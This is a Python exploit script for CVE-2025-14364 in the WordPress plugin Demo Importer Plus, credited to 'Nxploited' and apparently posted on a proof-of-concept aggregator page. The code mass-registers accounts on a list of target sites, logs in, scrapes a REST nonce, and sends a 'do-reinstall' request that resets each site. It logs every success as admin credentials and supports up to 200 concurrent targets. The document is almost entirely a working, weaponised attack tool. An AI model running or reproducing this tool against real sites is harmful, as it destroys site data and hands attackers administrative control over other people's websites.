5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-14364.py PY
#!/usr/bin/env python3
#By: Nxploited
from __future__ import annotations

import asyncio
import aiohttp
import socket
import sys
import os
import json
import random
from datetime import datetime
from urllib.parse import urlparse

import urllib3
from colorama import Fore, Style, init as color_init

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
color_init(autoreset=True)

RESULTS_FILE = "diagnostics_results.txt"
PASSED_FILE = "passed_targets.txt"
REGISTER_RESULTS_FILE = "register_results.txt"
EXPLOIT_RESULTS_FILE = "exploit_results.txt"
RESET_RESULTS_FILE = "reset_results.txt"

DEFAULT_TARGETS_FILE = "list.txt"
DEFAULT_CONCURRENCY = 30
DEFAULT_TIMEOUT = 10
MAX_CONCURRENCY = 200

USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Safari/605.1.15",
]

DEFAULT_REG_USERNAME = "Nxploited"
DEFAULT_REG_PASSWORD = "NxploitedSA"

LOGIN_PATH = "/wp-login.php"


def now_ts() -> str:
    return datetime.now().strftime("%Y-%m-%d %H:%M:%S")


def time_tag() -> str:
    return datetime.now().strftime("%H:%M:%S")


def rand_ua() -> str:
    return random.choice(USER_AGENTS)


def normalize_url(u: str) -> str:
    if not u:
        return ""
    if not u.startswith(("http://", "https://")):
        u = "http://" + u
    p = urlparse(u)
    return f"{p.scheme}://{p.netloc}"


def center_text(s: str, width: int = 80) -> str:
    if len(s) >= width:
        return s
    return s.center(width)


def safe_write_line(path: str, line: str) -> None:
    try:
        with open(path, "a", encoding="utf-8") as f:
            f.write(line + "\n")
            f.flush()
            try:
                os.fsync(f.fileno())
            except Exception:
                pass
    except Exception:
        pass


def print_success(msg: str):
    tag = time_tag()
    print(f"[{tag}] {Fore.GREEN + Style.BRIGHT}SUCCESS{Style.RESET_ALL} {msg}")


def print_fail(msg: str):
    tag = time_tag()
    print(f"[{tag}] {Fore.RED + Style.DIM}FAIL{Style.RESET_ALL} {msg}")


def draw_banner(width: int = 90):
    os.system('cls' if os.name == 'nt' else 'clear')
    title_lines = [
        "  _      _   _   _  _   _            _   _      ",
        " / \\  / |_ __ ) / \\  ) |_ __ /| |_|_ _) |_ |_|_ ",
        " \\_ \\/  |_   /_ \\_/ /_  _)    |   |  _) |_)  |  ",
        "                                                ",
    ]
    sub = "WP Email Register · Manual Activation · Demo Importer Plus exploit"
    github = "GitHub: https://github.com/Nxploited"
    telegram = "Telegram: @Kxploit"
    line = "─" * (width - 2)
    print(Fore.CYAN + "┌" + line + "┐" + Style.RESET_ALL)
    for tl in title_lines:
        print(Fore.BLUE + "│" + center_text(tl, width - 2) + "│" + Style.RESET_ALL)
    print(Fore.CYAN + "├" + line + "┤" + Style.RESET_ALL)
    print(Fore.MAGENTA + "│" + center_text(sub, width - 2) + "│" + Style.RESET_ALL)
    print(Fore.GREEN + "│" + center_text(github + "    " + telegram, width - 2) + "│" + Style.RESET_ALL)
    print(Fore.CYAN + "└" + line + "┘" + Style.RESET_ALL)
    print()


async def resolve_dns(host: str) -> dict:
    loop = asyncio.get_event_loop()
    res = {"host": host, "ok": False, "addrs": [], "error": None}
    try:
        addrs = await loop.run_in_executor(None, socket.getaddrinfo, host, None)
        ips = sorted({a[4][0] for a in addrs if a and a[4]})
        res["ok"] = True
        res["addrs"] = ips
    except Exception as e:
        res["error"] = str(e)
    return res


async def http_get(session: aiohttp.ClientSession, url: str, timeout: int):
    out = {"url": url, "status": None, "text_head": None, "error": None}
    try:
        async with session.get(url, timeout=timeout, ssl=False, allow_redirects=True) as r:
            out["status"] = r.status
            txt = await r.text(errors="replace")
            out["text_head"] = txt[:800]
    except Exception as e:
        out["error"] = str(e)
    return out


async def register_user_wordpress(
    raw_target: str,
    email: str,
    username: str,
    password: str,
    timeout: int,
    sem: asyncio.Semaphore
) -> dict:
    target = normalize_url(raw_target)
    if not target:
        return {"target": raw_target, "status": "invalid_target"}

    async with sem:
        connector = aiohttp.TCPConnector(limit_per_host=4, ssl=False)
        async with aiohttp.ClientSession(connector=connector) as session:
            register_url = f"{target}/wp-login.php?action=register"
            headers = {"User-Agent": rand_ua(), "Content-Type": "application/x-www-form-urlencoded"}
            try:
                async with session.get(register_url, timeout=timeout, ssl=False, headers={"User-Agent": rand_ua()}) as r:
                    reg_page = await r.text(errors="replace")
                    import re
                    nonce = None
                    m = re.search(r'name="_wpnonce"\s+value="([^"]+)"', reg_page)
                    if m:
                        nonce = m.group(1)

                post_data = {
                    "user_login": username,
                    "user_email": email,
                    "redirect_to": "",
                    "wp-submit": "Register",
                }
                if nonce:
                    post_data["_wpnonce"] = nonce

                async with session.post(register_url, data=post_data, timeout=timeout, ssl=False, headers=headers) as resp:
                    txt = await resp.text(errors="replace")
                    status = resp.status
                    snippet = txt[:400]
                    safe_write_line(
                        REGISTER_RESULTS_FILE,
                        json.dumps(
                            {
                                "timestamp": now_ts(),
                                "target": target,
                                "http_status": status,
                                "body_snippet": snippet,
                                "username": username,
                                "email": email,
                            },
                            ensure_ascii=False,
                        ),
                    )
                    print_success(f"Register attempt -> {target} (user={username}, email={email})  [Check your email]")
                    return {"target": target, "status": "register_attempt_sent", "http_status": status}
            except Exception as e:
                print_fail(f"Register error {target} -> {e}  [Check your email]")
                safe_write_line(
                    REGISTER_RESULTS_FILE,
                    json.dumps(
                        {
                            "timestamp": now_ts(),
                            "target": target,
                            "status": "register_error",
                            "error": str(e),
                        },
                        ensure_ascii=False,
                    ),
                )
                return {"target": target, "status": "register_error", "error": str(e)}


async def login_and_get_cookies(
    session: aiohttp.ClientSession,
    base_url: str,
    username: str,
    password: str,
    timeout: int,
) -> tuple[bool, str]:
    login_url = f"{base_url}{LOGIN_PATH}"
    headers = {"User-Agent": rand_ua(), "Content-Type": "application/x-www-form-urlencoded", "Referer": login_url}
    post_data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "testcookie": "1",
        "redirect_to": f"{base_url}/wp-admin/",
    }
    try:
        async with session.post(
            login_url,
            data=post_data,
            timeout=timeout,
            ssl=False,
            allow_redirects=True,
            headers=headers,
        ) as resp:
            body = await resp.text(errors="replace")
            final_url = str(resp.url)
            if "wp-login.php" not in final_url and ("/wp-admin/" in final_url or "dashboard" in body.lower()):
                return True, final_url
            if "profile.php" in body.lower() or "logout" in body.lower():
                return True, final_url
            safe_write_line(
                EXPLOIT_RESULTS_FILE,
                json.dumps(
                    {
                        "timestamp": now_ts(),
                        "target": base_url,
                        "phase": "login_failed",
                        "status": resp.status,
                        "url": final_url,
                        "body_snippet": body[:400],
                    },
                    ensure_ascii=False,
                ),
            )
            return False, final_url
    except Exception as e:
        safe_write_line(
            EXPLOIT_RESULTS_FILE,
            json.dumps(
                {
                    "timestamp": now_ts(),
                    "target": base_url,
                    "phase": "login_error",
                    "error": str(e),
                },
                ensure_ascii=False,
            ),
        )
        return False, ""


async def extract_wp_rest_nonce(
    session: aiohttp.ClientSession,
    base_url: str,
    timeout: int,
) -> str | None:
    url = f"{base_url}/wp-admin/"
    try:
        async with session.get(url, timeout=timeout, ssl=False, headers={"User-Agent": rand_ua()}) as resp:
            txt = await resp.text(errors="replace")
            import re

            m = re.search(r'wpApiSettings\s*=\s*({.*?});', txt, re.DOTALL)
            if m:
                try:
                    js = m.group(1)
                    js = js.replace("'", '"')
                    j = json.loads(js)
                    nonce = j.get("nonce")
                    if nonce:
                        safe_write_line(
                            EXPLOIT_RESULTS_FILE,
                            json.dumps(
                                {
                                    "timestamp": now_ts(),
                                    "target": base_url,
                                    "phase": "nonce_extracted_wpApiSettings",
                                    "nonce": nonce,
                                },
                                ensure_ascii=False,
                            ),
                        )
                        return nonce
                except Exception:
                    pass

            m2 = re.search(r'elementorOneSettingsData\s*=\s*({.*?});', txt, re.DOTALL)
            if m2:
                try:
                    js = m2.group(1)
                    js = js.replace("'", '"')
                    j = json.loads(js)
                    nonce = j.get("wpRestNonce")
                    if nonce:
                        safe_write_line(
                            EXPLOIT_RESULTS_FILE,
                            json.dumps(
                                {
                                    "timestamp": now_ts(),
                                    "target": base_url,
                                    "phase": "nonce_extracted_elementor",
                                    "nonce": nonce,
                                },
                                ensure_ascii=False,
                            ),
                        )
                        return nonce
                except Exception:
                    pass

            safe_write_line(
                EXPLOIT_RESULTS_FILE,
                json.dumps(
                    {
                        "timestamp": now_ts(),
                        "target": base_url,
                        "phase": "nonce_not_found",
                        "status": resp.status,
                    },
                    ensure_ascii=False,
                ),
            )
            return None
    except Exception as e:
        safe_write_line(
            EXPLOIT_RESULTS_FILE,
            json.dumps(
                {
                    "timestamp": now_ts(),
                    "target": base_url,
                    "phase": "nonce_error",
                    "error": str(e),
                },
                ensure_ascii=False,
            ),
        )
        return None


async def do_demo_importer_reset(
    session: aiohttp.ClientSession,
    base_url: str,
    wp_rest_nonce: str,
    timeout: int,
) -> tuple[bool, str]:
    ajax_url = f"{base_url}/wp-admin/admin-ajax.php?action=demo_importer_plus"
    headers = {
        "User-Agent": rand_ua(),
        "Content-Type": "application/json",
        "X-WP-Nonce": wp_rest_nonce,
    }
    payload = {"demo_action": "do-reinstall"}
    try:
        async with session.post(ajax_url, json=payload, timeout=timeout, ssl=False, headers=headers) as resp:
            txt = await resp.text(errors="replace")
            body_snippet = txt[:400]
            success = False
            try:
                j = json.loads(txt)
                s_val = j.get("success")
                msg = ""
                if isinstance(j.get("data"), dict):
                    msg = j["data"].get("message", "") or msg
                msg = msg or j.get("message", "") or ""
                if s_val is True and "site has been reset" in msg.lower():
                    success = True
            except Exception:
                if '"success":true' in txt.replace(" ", "").lower() and "site has been reset" in txt.lower():
                    success = True

            rec = {
                "timestamp": now_ts(),
                "target": base_url,
                "phase": "do_reinstall",
                "status": resp.status,
                "body_snippet": body_snippet,
            }
            safe_write_line(RESET_RESULTS_FILE, json.dumps(rec, ensure_ascii=False))
            return success, body_snippet
    except Exception as e:
        safe_write_line(
            RESET_RESULTS_FILE,
            json.dumps(
                {
                    "timestamp": now_ts(),
                    "target": base_url,
                    "phase": "do_reinstall_error",
                    "error": str(e),
                },
                ensure_ascii=False,
            ),
        )
        return False, str(e)


async def exploit_demo_importer_target(
    raw_target: str,
    username: str,
    password: str,
    timeout: int,
    sem: asyncio.Semaphore,
) -> dict:
    target = normalize_url(raw_target)
    if not target:
        return {"target": raw_target, "status": "invalid_target"}

    async with sem:
        connector = aiohttp.TCPConnector(limit_per_host=4, ssl=False)
        async with aiohttp.ClientSession(connector=connector) as session:
            base = target
            try:
                logged_in, final_url = await login_and_get_cookies(session, base, username, password, timeout)
                if not logged_in:
                    print_fail(f"Login failed -> {base}  [Check your email and credentials]")
                    return {"target": base, "status": "login_failed"}

                nonce = await extract_wp_rest_nonce(session, base, timeout)
                if not nonce:
                    print_fail(f"Nonce not found -> {base}")
                    return {"target": base, "status": "nonce_not_found"}

                ok_reset, snippet = await do_demo_importer_reset(session, base, nonce, timeout)
                if ok_reset:
                    print_success(f'success":true,"message":"Site has been reset successfully" -> {base}')
                    line = f"{base}{LOGIN_PATH} site:{base}{LOGIN_PATH} user:{username} pass:{password} type:admin"
                    safe_write_line(EXPLOIT_RESULTS_FILE, line)
                    return {"target": base, "status": "reset_success", "snippet": snippet}
                else:
                    print_fail(f"RESET FAIL -> {base}")
                    return {"target": base, "status": "reset_failed", "snippet": snippet}
            except asyncio.CancelledError:
                raise
            except Exception as e:
                print_fail(f"{base} error: {e}")
                safe_write_line(
                    EXPLOIT_RESULTS_FILE,
                    json.dumps(
                        {
                            "timestamp": now_ts(),
                            "target": base,
                            "status": "error",
                            "error": str(e),
                        },
                        ensure_ascii=False,
                    ),
                )
                return {"target": base, "status": "error", "error": str(e)}


async def probe_target(raw_target: str, timeout: int, sem: asyncio.Semaphore) -> dict:
    target = normalize_url(raw_target)
    parsed = urlparse(target)
    host = parsed.netloc
    result = {
        "timestamp": now_ts(),
        "target": target,
        "dns": None,
        "root": None,
        "wp_login": None,
        "admin_ajax": None,
        "rest_users": None,
        "errors": []
    }
    async with sem:
        dns = await resolve_dns(host)
        result["dns"] = dns
        if not dns["ok"]:
            result["errors"].append(f"DNS: {dns.get('error')}")
            return result
        connector = aiohttp.TCPConnector(limit_per_host=4, ssl=False)
        headers = {
            "User-Agent": rand_ua(),
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        }
        async with aiohttp.ClientSession(connector=connector, headers=headers) as session:
            paths = {
                "root": f"{target}/",
                "wp_login": f"{target}/wp-login.php",
                "admin_ajax": f"{target}/wp-admin/admin-ajax.php",
                "rest_users": f"{target}/wp-json/wp/v2/users",
            }
            for key, url in paths.items():
                r = await http_get(session, url, timeout)
                result[key] = r
                if r.get("error"):
                    result["errors"].append(f"{key}: {r['error']}")
                else:
                    if r.get("status") in (403, 429, 503, 500):
                        result["errors"].append(f"{key}: HTTP {r.get('status')}")
    return result


async def run_diagnose_mode_async(targets: list[str], concurrency: int, timeout: int):
    sem = asyncio.Semaphore(concurrency)
    tasks = [asyncio.create_task(probe_target(t, timeout, sem)) for t in targets]
    passed = []
    failed = []
    try:
        f_res = open(RESULTS_FILE, "w", encoding="utf-8")
    except Exception:
        f_res = None
    for coro in asyncio.as_completed(tasks):
        try:
            r = await coro
        except Exception:
            print_fail("unknown-target")
            continue
        success = (not r.get("errors"))
        if not success:
            print_fail(r["target"])
        if f_res:
            try:
                f_res.write(json.dumps(r, ensure_ascii=False) + "\n")
            except Exception:
                pass
        if success:
            passed.append(r["target"])
            try:
                with open(PASSED_FILE, "a", encoding="utf-8") as pf:
                    pf.write(r["target"] + "\n")
            except Exception:
                pass
        else:
            failed.append(r["target"])
    if f_res:
        f_res.close()
    print()
    print(Fore.CYAN + "Run complete." + Style.RESET_ALL, end=" ")
    print(f"{len(passed)} passed (silent), {len(failed)} failed. Results -> {RESULTS_FILE}")
    return passed, failed


async def run_register_mode(targets: list[str], concurrency: int, timeout: int, email: str, username: str, password: str):
    sem = asyncio.Semaphore(concurrency)
    tasks = [
        asyncio.create_task(register_user_wordpress(t, email, username, password, timeout, sem))
        for t in targets
    ]
    results = await asyncio.gather(*tasks, return_exceptions=True)
    return results


async def run_exploit_mode(targets: list[str], concurrency: int, timeout: int, username: str, password: str):
    sem = asyncio.Semaphore(concurrency)
    tasks = [
        asyncio.create_task(exploit_demo_importer_target(t, username, password, timeout, sem))
        for t in targets
    ]
    results = await asyncio.gather(*tasks, return_exceptions=True)
    return results


def load_targets(file_path: str) -> list[str]:
    try:
        with open(file_path, "r", encoding="utf-8") as fh:
            return [l.strip() for l in fh if l.strip()]
    except Exception as e:
        print(f"Failed to load targets file '{file_path}': {e}")
        return []


def prompt_inputs():
    draw_banner()
    print(Fore.YELLOW + "Select mode:" + Style.RESET_ALL)
    print("  1) Diagnose only (probe WordPress endpoints)")
    print("  2) Register only (WordPress registration)  [After run: check your email]")
    print("  3) Exploit Demo Importer Plus (login + do-reinstall)  [Ensure account is activated via email first]")
    mode = input("Mode [1/2/3] [default: 1]: ").strip() or "1"

    targets_file = input(f"Targets file (one per line) [default: {DEFAULT_TARGETS_FILE}]: ").strip() or DEFAULT_TARGETS_FILE
    try:
        concurrency = int(input(f"Concurrency (speed) [default: {DEFAULT_CONCURRENCY}, max {MAX_CONCURRENCY}]: ").strip() or str(DEFAULT_CONCURRENCY))
        concurrency = max(1, min(MAX_CONCURRENCY, concurrency))
    except Exception:
        concurrency = DEFAULT_CONCURRENCY
    try:
        timeout = int(input(f"Timeout seconds [default: {DEFAULT_TIMEOUT}]: ").strip() or str(DEFAULT_TIMEOUT))
        timeout = max(3, timeout)
    except Exception:
        timeout = DEFAULT_TIMEOUT

    email = ""
    username = DEFAULT_REG_USERNAME
    password = DEFAULT_REG_PASSWORD

    if mode == "2":
        print()
        print(Fore.CYAN + "Registration mode (after run: check your email)" + Style.RESET_ALL)
        email = input("Email to register with (required): ").strip()
        if not email:
            print("Email is required for registration mode.")
            sys.exit(1)
        username = input(f"Username [default: {DEFAULT_REG_USERNAME}]: ").strip() or DEFAULT_REG_USERNAME
        password = input(f"Password (local note only) [default: {DEFAULT_REG_PASSWORD}]: ").strip() or DEFAULT_REG_PASSWORD

    if mode == "3":
        print()
        print(Fore.CYAN + "Exploit mode (Demo Importer Plus do-reinstall)  [ensure account is activated via email]" + Style.RESET_ALL)
        print(f"Default credentials: user={DEFAULT_REG_USERNAME} pass={DEFAULT_REG_PASSWORD}")
        username = input(f"Exploit username [default: {DEFAULT_REG_USERNAME}]: ").strip() or DEFAULT_REG_USERNAME
        password = input(f"Exploit password [default: {DEFAULT_REG_PASSWORD}]: ").strip() or DEFAULT_REG_PASSWORD

    return mode, targets_file, concurrency, timeout, email, username, password


def main():
    mode, targets_file, concurrency, timeout, email, username, password = prompt_inputs()
    targets = load_targets(targets_file)
    if not targets:
        print("No targets found. Exiting.")
        sys.exit(1)

    try:
        open(RESULTS_FILE, "a", encoding="utf-8").close()
        open(PASSED_FILE, "a", encoding="utf-8").close()
        open(REGISTER_RESULTS_FILE, "a", encoding="utf-8").close()
        open(EXPLOIT_RESULTS_FILE, "a", encoding="utf-8").close()
        open(RESET_RESULTS_FILE, "a", encoding="utf-8").close()
    except Exception:
        pass

    print(f"Starting: mode={mode} targets={len(targets)} concurrency={concurrency} timeout={timeout}s")

    try:
        if mode == "1":
            asyncio.run(run_diagnose_mode_async(targets, concurrency, timeout))
        elif mode == "2":
            asyncio.run(run_register_mode(targets, concurrency, timeout, email, username, password))
        elif mode == "3":
            asyncio.run(run_exploit_mode(targets, concurrency, timeout, username, password))
        else:
            print("Unknown mode. Exiting.")
    except KeyboardInterrupt:
        print("\nInterrupted by user.")
    except Exception as e:
        print(f"Fatal: {e}")


if __name__ == "__main__":
    main()